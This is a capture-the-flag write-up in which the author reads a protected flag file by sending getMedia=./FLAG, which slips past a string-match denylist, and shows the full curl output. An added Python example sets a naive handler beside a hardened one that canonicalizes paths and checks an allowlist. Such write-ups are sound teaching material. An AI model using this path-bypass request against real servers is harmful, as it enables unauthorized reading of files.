Read The Flag
Solution
Under the challenge address there are a few words from the author.
But on a closer look I realized that I'd been redirected from the original address.
I investigated the redirection path, which looks like this:
https://ch2.sbug.se/ => https://ch2.sbug.se/get?getMedia=README => https://ch2.sbug.se/read
The /get?getMedia=README response sets the cookie below:
< set-cookie: content="H3llo\012This is my resume.\012I am EXPERT in cyber security\012"; Path=/
which after redirection is displayed under the /read address.
I played a bit with it until I found that https://ch2.sbug.se/get?getMedia=FLAG responds with a YOU CANNOT GET A FLAG THAT EASY message. That's why I tried the request below:
curl 'https://ch2.sbug.se/get?getMedia=./FLAG' -v
* Trying 172.67.202.196:443...
* Connected to ch2.sbug.se (172.67.202.196) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
* CAfile: /etc/ssl/certs/ca-certificates.crt
* CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8):
* TLSv1.3 (IN), TLS handshake, Certificate (11):
* TLSv1.3 (IN), TLS handshake, CERT verify (15):
* TLSv1.3 (IN), TLS handshake, Finished (20):
* TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.3 (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384
* ALPN, server accepted to use h2
* Server certificate:
* subject: C=US; ST=California; L=San Francisco; O=Cloudflare, Inc.; CN=sni.cloudflaressl.com
* start date: Mar 8 00:00:00 2021 GMT
* expire date: Mar 7 23:59:59 2022 GMT
* subjectAltName: host "ch2.sbug.se" matched cert's "*.sbug.se"
* issuer: C=US; O=Cloudflare, Inc.; CN=Cloudflare Inc ECC CA-3
* SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55901e3ca560)
> GET /get?getMedia=./FLAG HTTP/2
> Host: ch2.sbug.se
> user-agent: curl/7.74.0
> accept: */*
>
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* old SSL session ID is stale, removing
* Connection state changed (MAX_CONCURRENT_STREAMS == 256)!
< HTTP/2 302
< date: Tue, 20 Apr 2021 18:30:57 GMT
< content-type: text/html; charset=utf-8
< set-cookie: __cfduid=d2e8b3c0a2ee3362d38825d94d517a3d51618943457; expires=Thu, 20-May-21 18:30:57 GMT; path=/; domain=.sbug.se; HttpOnly; SameSite=Lax; Secure
< location: https://ch2.sbug.se/read
< set-cookie: content="SBCTF{H0W_C0ULD_Y0U_R3AD_TH3_FL4G}\012"; Path=/
< cf-cache-status: DYNAMIC
< cf-request-id: 099225cfc800009d127131b000000001
< expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
< report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YCgCZJN%2BAHTWNQvla1%2B0C32CkovAgJ8ByqWQwd1JYOV6uj77HqByk1adOR1Dou8j7%2BBTx5Otb%2Bms%2FoIngEhqqwfXhmSRKCTMah6reQ%3D%3D"}],"max_age":604800,"group":"cf-nel"}
< nel: {"report_to":"cf-nel","max_age":604800}
< server: cloudflare
< cf-ray: 6430725faae19d12-AMS
< alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Flag
SBCTF{H0W_C0ULD_Y0U_R3AD_TH3_FL4G}
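
The challenge's server code is not shown in this write-up. The added example below (not the challenge's code) assumes a handler that compares the raw getMedia value against a blocked name before opening the file, which would give the behaviour seen above, and sets it beside a version that canonicalizes the path and checks an allowlist. The names naive_read, hardened_read, BLOCKED and the sample files are hypothetical.

```python
import os
import tempfile

BLOCKED = {"FLAG"}  # assumed denylist: names the handler refuses to serve


def naive_read(media_dir, name):
    """Assumed 'before': compares the raw parameter, then opens the joined path."""
    if name in BLOCKED:
        return "YOU CANNOT GET A FLAG THAT EASY"
    with open(os.path.join(media_dir, name)) as fh:
        return fh.read()


def hardened_read(media_dir, name, allowed=frozenset({"README"})):
    """Canonicalize first, then decide on the resolved path with an allowlist."""
    root = os.path.realpath(media_dir)
    target = os.path.realpath(os.path.join(root, name))
    # Reject anything that resolves outside the media directory.
    if os.path.commonpath([root, target]) != root:
        raise PermissionError("outside media directory")
    # Decide on the canonical file name, not on the string the client sent.
    if os.path.relpath(target, root) not in allowed:
        raise PermissionError("not an allowed media file")
    with open(target) as fh:
        return fh.read()


def demo():
    """Run both handlers over constructed files; return what each one does."""
    results = {}
    with tempfile.TemporaryDirectory() as media_dir:
        # Constructed sample files, not the challenge's real content.
        for fname, body in (("README", "hello\n"), ("FLAG", "SAMPLE{constructed}\n")):
            with open(os.path.join(media_dir, fname), "w") as fh:
                fh.write(body)
        for name in ("README", "FLAG", "./FLAG"):
            naive = naive_read(media_dir, name)
            try:
                hard = hardened_read(media_dir, name)
            except PermissionError as exc:
                hard = "denied: " + str(exc)
            results[name] = (naive, hard)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(repr(name), outcome)
```

In the naive handler "FLAG" and "./FLAG" are different strings that open the same file, so only the first is refused; the hardened handler resolves both to the same path before deciding.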